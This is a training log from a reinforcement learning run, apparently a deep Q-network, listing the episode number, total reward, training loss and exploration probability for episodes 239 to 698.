Episode: 239 Total reward: 10.0 Training loss: 124.7320 Explore P: 0.6716
Episode: 240 Total reward: 18.0 Training loss: 2.5475 Explore P: 0.6704
Episode: 241 Total reward: 37.0 Training loss: 2.1454 Explore P: 0.6679
Episode: 242 Total reward: 11.0 Training loss: 23.6042 Explore P: 0.6672
Episode: 243 Total reward: 32.0 Training loss: 1.4344 Explore P: 0.6651
Episode: 244 Total reward: 9.0 Training loss: 1.5328 Explore P: 0.6645
Episode: 245 Total reward: 14.0 Training loss: 84.7870 Explore P: 0.6636
Episode: 246 Total reward: 12.0 Training loss: 2.7292 Explore P: 0.6628
Episode: 247 Total reward: 26.0 Training loss: 40.6692 Explore P: 0.6611
Episode: 248 Total reward: 12.0 Training loss: 22.0901 Explore P: 0.6603
Episode: 249 Total reward: 15.0 Training loss: 37.9304 Explore P: 0.6594
Episode: 250 Total reward: 20.0 Training loss: 1.4137 Explore P: 0.6581
Episode: 251 Total reward: 16.0 Training loss: 1.7831 Explore P: 0.6570
Episode: 252 Total reward: 9.0 Training loss: 38.0640 Explore P: 0.6565
Episode: 253 Total reward: 17.0 Training loss: 21.7703 Explore P: 0.6554
Episode: 254 Total reward: 24.0 Training loss: 40.3204 Explore P: 0.6538
Episode: 255 Total reward: 30.0 Training loss: 43.4179 Explore P: 0.6519
Episode: 256 Total reward: 11.0 Training loss: 60.9330 Explore P: 0.6512
Episode: 257 Total reward: 14.0 Training loss: 66.6886 Explore P: 0.6503
Episode: 258 Total reward: 15.0 Training loss: 2.5639 Explore P: 0.6493
Episode: 259 Total reward: 19.0 Training loss: 2.6969 Explore P: 0.6481
Episode: 260 Total reward: 10.0 Training loss: 2.6837 Explore P: 0.6475
Episode: 261 Total reward: 30.0 Training loss: 20.6603 Explore P: 0.6456
Episode: 262 Total reward: 17.0 Training loss: 32.1585 Explore P: 0.6445
Episode: 263 Total reward: 15.0 Training loss: 1.0833 Explore P: 0.6435
Episode: 264 Total reward: 13.0 Training loss: 81.4551 Explore P: 0.6427
Episode: 265 Total reward: 17.0 Training loss: 3.3823 Explore P: 0.6416
Episode: 266 Total reward: 11.0 Training loss: 36.3942 Explore P: 0.6409
Episode: 267 Total reward: 11.0 Training loss: 1.6628 Explore P: 0.6402
Episode: 268 Total reward: 33.0 Training loss: 26.9925 Explore P: 0.6382
Episode: 269 Total reward: 18.0 Training loss: 45.8608 Explore P: 0.6370
Episode: 270 Total reward: 20.0 Training loss: 2.7911 Explore P: 0.6358
Episode: 271 Total reward: 10.0 Training loss: 35.9215 Explore P: 0.6352
Episode: 272 Total reward: 14.0 Training loss: 2.5923 Explore P: 0.6343
Episode: 273 Total reward: 16.0 Training loss: 41.2339 Explore P: 0.6333
Episode: 274 Total reward: 18.0 Training loss: 46.7318 Explore P: 0.6322
Episode: 275 Total reward: 14.0 Training loss: 2.7245 Explore P: 0.6313
Episode: 276 Total reward: 8.0 Training loss: 16.2681 Explore P: 0.6308
Episode: 277 Total reward: 10.0 Training loss: 21.6856 Explore P: 0.6302
Episode: 278 Total reward: 12.0 Training loss: 1.7879 Explore P: 0.6294
Episode: 279 Total reward: 10.0 Training loss: 97.1567 Explore P: 0.6288
Episode: 280 Total reward: 16.0 Training loss: 3.4710 Explore P: 0.6278
Episode: 281 Total reward: 14.0 Training loss: 65.8457 Explore P: 0.6270
Episode: 282 Total reward: 21.0 Training loss: 32.4442 Explore P: 0.6257
Episode: 283 Total reward: 17.0 Training loss: 48.0136 Explore P: 0.6246
Episode: 284 Total reward: 11.0 Training loss: 2.8833 Explore P: 0.6239
Episode: 285 Total reward: 16.0 Training loss: 92.6062 Explore P: 0.6230
Episode: 286 Total reward: 16.0 Training loss: 19.1051 Explore P: 0.6220
Episode: 287 Total reward: 7.0 Training loss: 1.8220 Explore P: 0.6216
Episode: 288 Total reward: 16.0 Training loss: 41.3844 Explore P: 0.6206
Episode: 289 Total reward: 18.0 Training loss: 50.0580 Explore P: 0.6195
Episode: 290 Total reward: 13.0 Training loss: 83.2142 Explore P: 0.6187
Episode: 291 Total reward: 14.0 Training loss: 70.2605 Explore P: 0.6178
Episode: 292 Total reward: 16.0 Training loss: 53.9664 Explore P: 0.6169
Episode: 293 Total reward: 17.0 Training loss: 3.2764 Explore P: 0.6158
Episode: 294 Total reward: 18.0 Training loss: 17.7963 Explore P: 0.6147
Episode: 295 Total reward: 17.0 Training loss: 32.3772 Explore P: 0.6137
Episode: 296 Total reward: 32.0 Training loss: 18.3755 Explore P: 0.6118
Episode: 297 Total reward: 29.0 Training loss: 17.1377 Explore P: 0.6100
Episode: 298 Total reward: 12.0 Training loss: 14.2922 Explore P: 0.6093
Episode: 299 Total reward: 14.0 Training loss: 29.2226 Explore P: 0.6085
Episode: 300 Total reward: 17.0 Training loss: 38.9089 Explore P: 0.6075
Episode: 301 Total reward: 9.0 Training loss: 62.2483 Explore P: 0.6069
Episode: 302 Total reward: 22.0 Training loss: 2.3240 Explore P: 0.6056
Episode: 303 Total reward: 16.0 Training loss: 0.9979 Explore P: 0.6047
Episode: 304 Total reward: 8.0 Training loss: 67.9231 Explore P: 0.6042
Episode: 305 Total reward: 13.0 Training loss: 33.0928 Explore P: 0.6034
Episode: 306 Total reward: 20.0 Training loss: 1.3173 Explore P: 0.6022
Episode: 307 Total reward: 23.0 Training loss: 50.2106 Explore P: 0.6009
Episode: 308 Total reward: 17.0 Training loss: 52.5245 Explore P: 0.5999
Episode: 309 Total reward: 20.0 Training loss: 32.5832 Explore P: 0.5987
Episode: 310 Total reward: 19.0 Training loss: 29.0224 Explore P: 0.5976
Episode: 311 Total reward: 19.0 Training loss: 29.8863 Explore P: 0.5965
Episode: 312 Total reward: 27.0 Training loss: 34.4016 Explore P: 0.5949
Episode: 313 Total reward: 9.0 Training loss: 1.1433 Explore P: 0.5944
Episode: 314 Total reward: 20.0 Training loss: 28.8137 Explore P: 0.5932
Episode: 315 Total reward: 24.0 Training loss: 48.5379 Explore P: 0.5918
Episode: 316 Total reward: 28.0 Training loss: 45.2671 Explore P: 0.5902
Episode: 317 Total reward: 13.0 Training loss: 45.9822 Explore P: 0.5894
Episode: 318 Total reward: 12.0 Training loss: 86.3972 Explore P: 0.5887
Episode: 319 Total reward: 10.0 Training loss: 11.2909 Explore P: 0.5881
Episode: 320 Total reward: 11.0 Training loss: 36.5474 Explore P: 0.5875
Episode: 321 Total reward: 13.0 Training loss: 1.1439 Explore P: 0.5867
Episode: 322 Total reward: 8.0 Training loss: 12.6978 Explore P: 0.5863
Episode: 323 Total reward: 20.0 Training loss: 31.7664 Explore P: 0.5851
Episode: 324 Total reward: 8.0 Training loss: 29.4243 Explore P: 0.5847
Episode: 325 Total reward: 13.0 Training loss: 12.2373 Explore P: 0.5839
Episode: 326 Total reward: 19.0 Training loss: 24.2228 Explore P: 0.5828
Episode: 327 Total reward: 68.0 Training loss: 0.7256 Explore P: 0.5790
Episode: 328 Total reward: 11.0 Training loss: 1.2313 Explore P: 0.5783
Episode: 329 Total reward: 15.0 Training loss: 1.3319 Explore P: 0.5775
Episode: 330 Total reward: 53.0 Training loss: 9.9350 Explore P: 0.5745
Episode: 331 Total reward: 74.0 Training loss: 1.4366 Explore P: 0.5703
Episode: 332 Total reward: 16.0 Training loss: 11.2724 Explore P: 0.5694
Episode: 333 Total reward: 34.0 Training loss: 10.6128 Explore P: 0.5675
Episode: 334 Total reward: 27.0 Training loss: 14.9559 Explore P: 0.5660
Episode: 335 Total reward: 31.0 Training loss: 16.6541 Explore P: 0.5643
Episode: 336 Total reward: 49.0 Training loss: 23.3966 Explore P: 0.5616
Episode: 337 Total reward: 40.0 Training loss: 45.3419 Explore P: 0.5594
Episode: 338 Total reward: 71.0 Training loss: 0.8244 Explore P: 0.5555
Episode: 339 Total reward: 56.0 Training loss: 41.4562 Explore P: 0.5525
Episode: 340 Total reward: 18.0 Training loss: 1.2548 Explore P: 0.5515
Episode: 341 Total reward: 56.0 Training loss: 1.5400 Explore P: 0.5485
Episode: 342 Total reward: 34.0 Training loss: 12.0206 Explore P: 0.5466
Episode: 343 Total reward: 67.0 Training loss: 1.4189 Explore P: 0.5430
Episode: 344 Total reward: 27.0 Training loss: 1.3138 Explore P: 0.5416
Episode: 345 Total reward: 42.0 Training loss: 1.1650 Explore P: 0.5394
Episode: 346 Total reward: 23.0 Training loss: 23.1743 Explore P: 0.5382
Episode: 347 Total reward: 54.0 Training loss: 0.6971 Explore P: 0.5353
Episode: 348 Total reward: 34.0 Training loss: 27.2789 Explore P: 0.5335
Episode: 349 Total reward: 25.0 Training loss: 37.4133 Explore P: 0.5322
Episode: 350 Total reward: 20.0 Training loss: 1.6443 Explore P: 0.5312
Episode: 351 Total reward: 26.0 Training loss: 12.6839 Explore P: 0.5298
Episode: 352 Total reward: 40.0 Training loss: 13.3593 Explore P: 0.5278
Episode: 353 Total reward: 18.0 Training loss: 1.7079 Explore P: 0.5268
Episode: 354 Total reward: 47.0 Training loss: 32.5788 Explore P: 0.5244
Episode: 355 Total reward: 20.0 Training loss: 1.6101 Explore P: 0.5234
Episode: 356 Total reward: 53.0 Training loss: 2.5321 Explore P: 0.5207
Episode: 357 Total reward: 15.0 Training loss: 1.6396 Explore P: 0.5199
Episode: 358 Total reward: 76.0 Training loss: 20.8058 Explore P: 0.5160
Episode: 359 Total reward: 12.0 Training loss: 13.0315 Explore P: 0.5154
Episode: 360 Total reward: 42.0 Training loss: 10.1313 Explore P: 0.5133
Episode: 361 Total reward: 53.0 Training loss: 25.4319 Explore P: 0.5106
Episode: 362 Total reward: 33.0 Training loss: 26.4256 Explore P: 0.5090
Episode: 363 Total reward: 85.0 Training loss: 20.2429 Explore P: 0.5048
Episode: 364 Total reward: 23.0 Training loss: 16.1083 Explore P: 0.5036
Episode: 365 Total reward: 30.0 Training loss: 1.6888 Explore P: 0.5022
Episode: 366 Total reward: 66.0 Training loss: 2.0408 Explore P: 0.4989
Episode: 367 Total reward: 37.0 Training loss: 18.6438 Explore P: 0.4971
Episode: 368 Total reward: 50.0 Training loss: 20.1544 Explore P: 0.4947
Episode: 369 Total reward: 78.0 Training loss: 23.8497 Explore P: 0.4909
Episode: 370 Total reward: 83.0 Training loss: 20.6897 Explore P: 0.4869
Episode: 371 Total reward: 44.0 Training loss: 25.4317 Explore P: 0.4849
Episode: 372 Total reward: 44.0 Training loss: 1.5212 Explore P: 0.4828
Episode: 373 Total reward: 14.0 Training loss: 1.5019 Explore P: 0.4821
Episode: 374 Total reward: 31.0 Training loss: 1.8348 Explore P: 0.4806
Episode: 375 Total reward: 25.0 Training loss: 19.7533 Explore P: 0.4795
Episode: 376 Total reward: 51.0 Training loss: 1.5433 Explore P: 0.4771
Episode: 377 Total reward: 23.0 Training loss: 12.9174 Explore P: 0.4760
Episode: 378 Total reward: 67.0 Training loss: 27.2318 Explore P: 0.4729
Episode: 379 Total reward: 26.0 Training loss: 1.9319 Explore P: 0.4717
Episode: 380 Total reward: 35.0 Training loss: 43.2445 Explore P: 0.4701
Episode: 381 Total reward: 33.0 Training loss: 1.5195 Explore P: 0.4686
Episode: 382 Total reward: 30.0 Training loss: 15.4622 Explore P: 0.4672
Episode: 383 Total reward: 12.0 Training loss: 1.8349 Explore P: 0.4666
Episode: 384 Total reward: 25.0 Training loss: 47.7600 Explore P: 0.4655
Episode: 385 Total reward: 36.0 Training loss: 29.6753 Explore P: 0.4639
Episode: 386 Total reward: 50.0 Training loss: 1.1244 Explore P: 0.4616
Episode: 387 Total reward: 35.0 Training loss: 1.0955 Explore P: 0.4600
Episode: 388 Total reward: 52.0 Training loss: 24.9624 Explore P: 0.4577
Episode: 389 Total reward: 52.0 Training loss: 28.2028 Explore P: 0.4554
Episode: 390 Total reward: 132.0 Training loss: 30.5190 Explore P: 0.4495
Episode: 391 Total reward: 25.0 Training loss: 10.3908 Explore P: 0.4484
Episode: 392 Total reward: 56.0 Training loss: 14.1483 Explore P: 0.4460
Episode: 393 Total reward: 110.0 Training loss: 2.0169 Explore P: 0.4412
Episode: 394 Total reward: 78.0 Training loss: 1.2122 Explore P: 0.4379
Episode: 395 Total reward: 44.0 Training loss: 56.4728 Explore P: 0.4360
Episode: 396 Total reward: 90.0 Training loss: 65.6667 Explore P: 0.4322
Episode: 397 Total reward: 36.0 Training loss: 0.9032 Explore P: 0.4307
Episode: 398 Total reward: 40.0 Training loss: 0.8414 Explore P: 0.4290
Episode: 399 Total reward: 109.0 Training loss: 42.5467 Explore P: 0.4244
Episode: 400 Total reward: 37.0 Training loss: 2.6053 Explore P: 0.4229
Episode: 401 Total reward: 62.0 Training loss: 1.2301 Explore P: 0.4203
Episode: 402 Total reward: 42.0 Training loss: 1.1384 Explore P: 0.4186
Episode: 403 Total reward: 71.0 Training loss: 1.6765 Explore P: 0.4157
Episode: 404 Total reward: 88.0 Training loss: 2.4000 Explore P: 0.4122
Episode: 405 Total reward: 55.0 Training loss: 24.7748 Explore P: 0.4100
Episode: 406 Total reward: 33.0 Training loss: 13.5934 Explore P: 0.4087
Episode: 407 Total reward: 44.0 Training loss: 14.6865 Explore P: 0.4069
Episode: 408 Total reward: 40.0 Training loss: 2.0898 Explore P: 0.4053
Episode: 409 Total reward: 98.0 Training loss: 2.1043 Explore P: 0.4015
Episode: 410 Total reward: 63.0 Training loss: 11.3562 Explore P: 0.3990
Episode: 411 Total reward: 50.0 Training loss: 14.1151 Explore P: 0.3971
Episode: 412 Total reward: 44.0 Training loss: 1.2370 Explore P: 0.3954
Episode: 413 Total reward: 56.0 Training loss: 2.1136 Explore P: 0.3932
Episode: 414 Total reward: 61.0 Training loss: 2.2578 Explore P: 0.3909
Episode: 415 Total reward: 49.0 Training loss: 1.3966 Explore P: 0.3890
Episode: 416 Total reward: 55.0 Training loss: 10.2836 Explore P: 0.3869
Episode: 417 Total reward: 121.0 Training loss: 2.2477 Explore P: 0.3824
Episode: 418 Total reward: 46.0 Training loss: 2.3118 Explore P: 0.3807
Episode: 419 Total reward: 70.0 Training loss: 27.3952 Explore P: 0.3781
Episode: 420 Total reward: 72.0 Training loss: 45.7570 Explore P: 0.3755
Episode: 421 Total reward: 41.0 Training loss: 59.1887 Explore P: 0.3740
Episode: 422 Total reward: 67.0 Training loss: 27.0998 Explore P: 0.3716
Episode: 423 Total reward: 46.0 Training loss: 43.1971 Explore P: 0.3699
Episode: 424 Total reward: 52.0 Training loss: 2.0718 Explore P: 0.3680
Episode: 425 Total reward: 92.0 Training loss: 96.7074 Explore P: 0.3647
Episode: 426 Total reward: 60.0 Training loss: 2.0684 Explore P: 0.3626
Episode: 427 Total reward: 106.0 Training loss: 54.1831 Explore P: 0.3589
Episode: 428 Total reward: 76.0 Training loss: 1.9612 Explore P: 0.3563
Episode: 429 Total reward: 42.0 Training loss: 1.6153 Explore P: 0.3548
Episode: 430 Total reward: 77.0 Training loss: 3.9801 Explore P: 0.3522
Episode: 431 Total reward: 123.0 Training loss: 2.0505 Explore P: 0.3480
Episode: 432 Total reward: 150.0 Training loss: 19.4217 Explore P: 0.3430
Episode: 433 Total reward: 57.0 Training loss: 1.5850 Explore P: 0.3411
Episode: 434 Total reward: 74.0 Training loss: 2.4292 Explore P: 0.3386
Episode: 435 Total reward: 97.0 Training loss: 23.5709 Explore P: 0.3354
Episode: 436 Total reward: 99.0 Training loss: 2.0727 Explore P: 0.3322
Episode: 437 Total reward: 101.0 Training loss: 22.3250 Explore P: 0.3290
Episode: 438 Total reward: 46.0 Training loss: 2.0320 Explore P: 0.3275
Episode: 439 Total reward: 51.0 Training loss: 4.8099 Explore P: 0.3259
Episode: 440 Total reward: 111.0 Training loss: 68.3524 Explore P: 0.3224
Episode: 441 Total reward: 167.0 Training loss: 2.3045 Explore P: 0.3173
Episode: 442 Total reward: 80.0 Training loss: 0.8798 Explore P: 0.3148
Episode: 443 Total reward: 170.0 Training loss: 48.6270 Explore P: 0.3097
Episode: 444 Total reward: 77.0 Training loss: 2.2555 Explore P: 0.3074
Episode: 445 Total reward: 84.0 Training loss: 3.0428 Explore P: 0.3049
Episode: 447 Total reward: 12.0 Training loss: 2.8022 Explore P: 0.2987
Episode: 448 Total reward: 66.0 Training loss: 120.3442 Explore P: 0.2968
Episode: 449 Total reward: 152.0 Training loss: 6.2880 Explore P: 0.2925
Episode: 450 Total reward: 141.0 Training loss: 2.8015 Explore P: 0.2885
Episode: 451 Total reward: 99.0 Training loss: 64.0921 Explore P: 0.2858
Episode: 452 Total reward: 79.0 Training loss: 1.5581 Explore P: 0.2836
Episode: 453 Total reward: 49.0 Training loss: 113.2557 Explore P: 0.2823
Episode: 455 Total reward: 106.0 Training loss: 210.4934 Explore P: 0.2741
Episode: 456 Total reward: 109.0 Training loss: 81.6662 Explore P: 0.2712
Episode: 457 Total reward: 56.0 Training loss: 3.2287 Explore P: 0.2697
Episode: 458 Total reward: 138.0 Training loss: 2.5795 Explore P: 0.2662
Episode: 459 Total reward: 93.0 Training loss: 3.4260 Explore P: 0.2638
Episode: 460 Total reward: 71.0 Training loss: 139.3341 Explore P: 0.2620
Episode: 461 Total reward: 106.0 Training loss: 2.6074 Explore P: 0.2594
Episode: 462 Total reward: 63.0 Training loss: 2.8252 Explore P: 0.2578
Episode: 463 Total reward: 71.0 Training loss: 25.8917 Explore P: 0.2560
Episode: 464 Total reward: 79.0 Training loss: 3.8067 Explore P: 0.2541
Episode: 465 Total reward: 86.0 Training loss: 1.6050 Explore P: 0.2520
Episode: 466 Total reward: 88.0 Training loss: 44.2827 Explore P: 0.2499
Episode: 467 Total reward: 72.0 Training loss: 0.7160 Explore P: 0.2482
Episode: 468 Total reward: 152.0 Training loss: 75.7239 Explore P: 0.2446
Episode: 469 Total reward: 122.0 Training loss: 7.4345 Explore P: 0.2417
Episode: 470 Total reward: 81.0 Training loss: 101.0922 Explore P: 0.2399
Episode: 471 Total reward: 38.0 Training loss: 1.6301 Explore P: 0.2390
Episode: 472 Total reward: 79.0 Training loss: 72.4920 Explore P: 0.2372
Episode: 473 Total reward: 190.0 Training loss: 1.3869 Explore P: 0.2329
Episode: 474 Total reward: 197.0 Training loss: 1.5386 Explore P: 0.2286
Episode: 476 Total reward: 42.0 Training loss: 0.8364 Explore P: 0.2233
Episode: 477 Total reward: 134.0 Training loss: 88.3979 Explore P: 0.2205
Episode: 478 Total reward: 128.0 Training loss: 94.1007 Explore P: 0.2178
Episode: 479 Total reward: 79.0 Training loss: 103.1366 Explore P: 0.2162
Episode: 480 Total reward: 169.0 Training loss: 58.8788 Explore P: 0.2127
Episode: 481 Total reward: 160.0 Training loss: 1.1934 Explore P: 0.2095
Episode: 482 Total reward: 81.0 Training loss: 2.9244 Explore P: 0.2079
Episode: 484 Total reward: 68.0 Training loss: 77.9688 Explore P: 0.2027
Episode: 486 Total reward: 17.0 Training loss: 0.6864 Explore P: 0.1985
Episode: 488 Total reward: 62.0 Training loss: 1.9978 Explore P: 0.1937
Episode: 489 Total reward: 178.0 Training loss: 228.6335 Explore P: 0.1904
Episode: 490 Total reward: 114.0 Training loss: 0.4453 Explore P: 0.1884
Episode: 491 Total reward: 127.0 Training loss: 1.6523 Explore P: 0.1861
Episode: 492 Total reward: 124.0 Training loss: 120.2207 Explore P: 0.1840
Episode: 493 Total reward: 184.0 Training loss: 0.5913 Explore P: 0.1808
Episode: 494 Total reward: 129.0 Training loss: 56.3829 Explore P: 0.1786
Episode: 495 Total reward: 95.0 Training loss: 1.9883 Explore P: 0.1770
Episode: 496 Total reward: 129.0 Training loss: 1.2513 Explore P: 0.1749
Episode: 497 Total reward: 176.0 Training loss: 1.0322 Explore P: 0.1720
Episode: 498 Total reward: 132.0 Training loss: 0.9320 Explore P: 0.1699
Episode: 499 Total reward: 146.0 Training loss: 289.4379 Explore P: 0.1675
Episode: 500 Total reward: 147.0 Training loss: 0.5124 Explore P: 0.1652
Episode: 501 Total reward: 166.0 Training loss: 0.9444 Explore P: 0.1627
Episode: 503 Total reward: 31.0 Training loss: 1.4756 Explore P: 0.1592
Episode: 504 Total reward: 129.0 Training loss: 0.6077 Explore P: 0.1573
Episode: 505 Total reward: 127.0 Training loss: 1.2508 Explore P: 0.1554
Episode: 506 Total reward: 123.0 Training loss: 0.8265 Explore P: 0.1537
Episode: 507 Total reward: 159.0 Training loss: 260.4604 Explore P: 0.1514
Episode: 508 Total reward: 136.0 Training loss: 0.9311 Explore P: 0.1495
Episode: 509 Total reward: 198.0 Training loss: 0.9262 Explore P: 0.1467
Episode: 511 Total reward: 40.0 Training loss: 2.3126 Explore P: 0.1435
Episode: 512 Total reward: 130.0 Training loss: 1.2985 Explore P: 0.1418
Episode: 514 Total reward: 25.0 Training loss: 1.1655 Explore P: 0.1388
Episode: 515 Total reward: 149.0 Training loss: 214.9246 Explore P: 0.1369
Episode: 516 Total reward: 200.0 Training loss: 0.8085 Explore P: 0.1344
Episode: 517 Total reward: 172.0 Training loss: 24.9451 Explore P: 0.1323
Episode: 519 Total reward: 52.0 Training loss: 61.7503 Explore P: 0.1293
Episode: 520 Total reward: 176.0 Training loss: 0.4361 Explore P: 0.1272
Episode: 521 Total reward: 160.0 Training loss: 1.8377 Explore P: 0.1253
Episode: 522 Total reward: 180.0 Training loss: 1.5684 Explore P: 0.1233
Episode: 523 Total reward: 174.0 Training loss: 58.6258 Explore P: 0.1213
Episode: 525 Total reward: 10.0 Training loss: 222.1836 Explore P: 0.1190
Episode: 527 Total reward: 32.0 Training loss: 0.4007 Explore P: 0.1165
Episode: 529 Total reward: 33.0 Training loss: 0.3054 Explore P: 0.1140
Episode: 530 Total reward: 185.0 Training loss: 0.7425 Explore P: 0.1121
Episode: 531 Total reward: 171.0 Training loss: 0.3441 Explore P: 0.1104
Episode: 532 Total reward: 199.0 Training loss: 0.2333 Explore P: 0.1084
Episode: 534 Total reward: 95.0 Training loss: 0.4929 Explore P: 0.1056
Episode: 536 Total reward: 8.0 Training loss: 0.5416 Explore P: 0.1036
Episode: 538 Total reward: 42.0 Training loss: 163.3946 Explore P: 0.1014
Episode: 539 Total reward: 180.0 Training loss: 0.2803 Explore P: 0.0997
Episode: 540 Total reward: 193.0 Training loss: 0.4929 Explore P: 0.0980
Episode: 542 Total reward: 36.0 Training loss: 0.7983 Explore P: 0.0960
Episode: 544 Total reward: 152.0 Training loss: 41.4165 Explore P: 0.0930
Episode: 546 Total reward: 30.0 Training loss: 0.7570 Explore P: 0.0911
Episode: 548 Total reward: 50.0 Training loss: 0.3215 Explore P: 0.0891
Episode: 550 Total reward: 79.0 Training loss: 0.5349 Explore P: 0.0869
Episode: 552 Total reward: 38.0 Training loss: 0.3635 Explore P: 0.0851
Episode: 553 Total reward: 131.0 Training loss: 0.3965 Explore P: 0.0841
Episode: 554 Total reward: 135.0 Training loss: 0.2453 Explore P: 0.0831
Episode: 555 Total reward: 111.0 Training loss: 0.9434 Explore P: 0.0823
Episode: 556 Total reward: 136.0 Training loss: 0.7058 Explore P: 0.0814
Episode: 557 Total reward: 106.0 Training loss: 0.4755 Explore P: 0.0806
Episode: 558 Total reward: 98.0 Training loss: 0.4107 Explore P: 0.0799
Episode: 559 Total reward: 102.0 Training loss: 62.3874 Explore P: 0.0792
Episode: 560 Total reward: 92.0 Training loss: 0.4026 Explore P: 0.0786
Episode: 561 Total reward: 86.0 Training loss: 0.3649 Explore P: 0.0780
Episode: 562 Total reward: 83.0 Training loss: 0.5843 Explore P: 0.0774
Episode: 563 Total reward: 100.0 Training loss: 0.1493 Explore P: 0.0768
Episode: 564 Total reward: 102.0 Training loss: 0.4021 Explore P: 0.0761
Episode: 565 Total reward: 60.0 Training loss: 0.3445 Explore P: 0.0757
Episode: 566 Total reward: 63.0 Training loss: 0.2461 Explore P: 0.0753
Episode: 567 Total reward: 59.0 Training loss: 0.2115 Explore P: 0.0749
Episode: 568 Total reward: 73.0 Training loss: 3.2738 Explore P: 0.0744
Episode: 569 Total reward: 70.0 Training loss: 0.4267 Explore P: 0.0740
Episode: 570 Total reward: 53.0 Training loss: 0.8779 Explore P: 0.0736
Episode: 571 Total reward: 88.0 Training loss: 187.5536 Explore P: 0.0731
Episode: 572 Total reward: 54.0 Training loss: 0.3208 Explore P: 0.0727
Episode: 573 Total reward: 87.0 Training loss: 0.2894 Explore P: 0.0722
Episode: 574 Total reward: 58.0 Training loss: 0.2578 Explore P: 0.0718
Episode: 575 Total reward: 85.0 Training loss: 0.3401 Explore P: 0.0713
Episode: 576 Total reward: 73.0 Training loss: 0.2245 Explore P: 0.0709
Episode: 577 Total reward: 114.0 Training loss: 0.3640 Explore P: 0.0702
Episode: 578 Total reward: 94.0 Training loss: 0.7954 Explore P: 0.0696
Episode: 579 Total reward: 114.0 Training loss: 0.2615 Explore P: 0.0689
Episode: 580 Total reward: 80.0 Training loss: 0.4812 Explore P: 0.0685
Episode: 581 Total reward: 125.0 Training loss: 0.8818 Explore P: 0.0677
Episode: 582 Total reward: 109.0 Training loss: 0.2953 Explore P: 0.0671
Episode: 583 Total reward: 98.0 Training loss: 0.4371 Explore P: 0.0665
Episode: 584 Total reward: 119.0 Training loss: 0.4685 Explore P: 0.0659
Episode: 585 Total reward: 96.0 Training loss: 0.3440 Explore P: 0.0653
Episode: 586 Total reward: 172.0 Training loss: 0.1414 Explore P: 0.0644
Episode: 587 Total reward: 104.0 Training loss: 0.3309 Explore P: 0.0638
Episode: 588 Total reward: 85.0 Training loss: 0.2262 Explore P: 0.0634
Episode: 590 Total reward: 104.0 Training loss: 0.3231 Explore P: 0.0618
Episode: 591 Total reward: 148.0 Training loss: 0.4431 Explore P: 0.0610
Episode: 592 Total reward: 135.0 Training loss: 0.1894 Explore P: 0.0603
Episode: 595 Total reward: 99.0 Training loss: 0.2376 Explore P: 0.0579
Episode: 597 Total reward: 172.0 Training loss: 0.4083 Explore P: 0.0561
Episode: 600 Total reward: 99.0 Training loss: 0.1152 Explore P: 0.0539
Episode: 603 Total reward: 99.0 Training loss: 0.3594 Explore P: 0.0518
Episode: 604 Total reward: 149.0 Training loss: 0.1398 Explore P: 0.0511
Episode: 607 Total reward: 99.0 Training loss: 0.3337 Explore P: 0.0491
Episode: 608 Total reward: 180.0 Training loss: 7.4786 Explore P: 0.0484
Episode: 611 Total reward: 28.0 Training loss: 0.1953 Explore P: 0.0468
Episode: 614 Total reward: 38.0 Training loss: 0.3152 Explore P: 0.0453
Episode: 617 Total reward: 50.0 Training loss: 0.4420 Explore P: 0.0437
Episode: 620 Total reward: 9.0 Training loss: 0.3347 Explore P: 0.0423
Episode: 623 Total reward: 99.0 Training loss: 0.1405 Explore P: 0.0408
Episode: 626 Total reward: 78.0 Training loss: 0.1488 Explore P: 0.0393
Episode: 628 Total reward: 198.0 Training loss: 0.9185 Explore P: 0.0382
Episode: 631 Total reward: 99.0 Training loss: 0.3505 Explore P: 0.0368
Episode: 633 Total reward: 142.0 Training loss: 0.1654 Explore P: 0.0359
Episode: 635 Total reward: 134.0 Training loss: 0.3178 Explore P: 0.0351
Episode: 637 Total reward: 104.0 Training loss: 0.3331 Explore P: 0.0343
Episode: 639 Total reward: 73.0 Training loss: 66.8497 Explore P: 0.0337
Episode: 641 Total reward: 35.0 Training loss: 0.1411 Explore P: 0.0331
Episode: 643 Total reward: 83.0 Training loss: 0.2136 Explore P: 0.0325
Episode: 645 Total reward: 62.0 Training loss: 0.2303 Explore P: 0.0319
Episode: 647 Total reward: 28.0 Training loss: 0.2552 Explore P: 0.0314
Episode: 649 Total reward: 4.0 Training loss: 0.1967 Explore P: 0.0310
Episode: 650 Total reward: 194.0 Training loss: 0.1424 Explore P: 0.0306
Episode: 651 Total reward: 170.0 Training loss: 0.1509 Explore P: 0.0302
Episode: 652 Total reward: 150.0 Training loss: 0.2699 Explore P: 0.0299
Episode: 653 Total reward: 161.0 Training loss: 0.2821 Explore P: 0.0296
Episode: 654 Total reward: 148.0 Training loss: 0.4859 Explore P: 0.0293
Episode: 655 Total reward: 142.0 Training loss: 0.1541 Explore P: 0.0290
Episode: 656 Total reward: 140.0 Training loss: 0.0963 Explore P: 0.0288
Episode: 657 Total reward: 144.0 Training loss: 0.3165 Explore P: 0.0285
Episode: 658 Total reward: 160.0 Training loss: 0.2059 Explore P: 0.0282
Episode: 659 Total reward: 127.0 Training loss: 0.0918 Explore P: 0.0280
Episode: 660 Total reward: 124.0 Training loss: 431.4700 Explore P: 0.0278
Episode: 661 Total reward: 127.0 Training loss: 0.2660 Explore P: 0.0275
Episode: 662 Total reward: 133.0 Training loss: 0.4122 Explore P: 0.0273
Episode: 663 Total reward: 119.0 Training loss: 0.2070 Explore P: 0.0271
Episode: 664 Total reward: 114.0 Training loss: 0.3453 Explore P: 0.0269
Episode: 665 Total reward: 130.0 Training loss: 0.3865 Explore P: 0.0267
Episode: 666 Total reward: 125.0 Training loss: 0.2518 Explore P: 0.0265
Episode: 667 Total reward: 138.0 Training loss: 0.1668 Explore P: 0.0263
Episode: 669 Total reward: 42.0 Training loss: 0.3241 Explore P: 0.0259
Episode: 671 Total reward: 105.0 Training loss: 0.1787 Explore P: 0.0254
Episode: 674 Total reward: 99.0 Training loss: 0.2393 Explore P: 0.0246
Episode: 677 Total reward: 99.0 Training loss: 0.2190 Explore P: 0.0239
Episode: 680 Total reward: 99.0 Training loss: 2.5996 Explore P: 0.0232
Episode: 683 Total reward: 99.0 Training loss: 0.3376 Explore P: 0.0226
Episode: 686 Total reward: 99.0 Training loss: 0.5884 Explore P: 0.0220
Episode: 689 Total reward: 99.0 Training loss: 0.1356 Explore P: 0.0214
Episode: 692 Total reward: 99.0 Training loss: 0.0920 Explore P: 0.0208
Episode: 695 Total reward: 99.0 Training loss: 0.1880 Explore P: 0.0203
Episode: 698 Total reward: 99.0 Training loss: 0.0951 Explore P: 0.0198
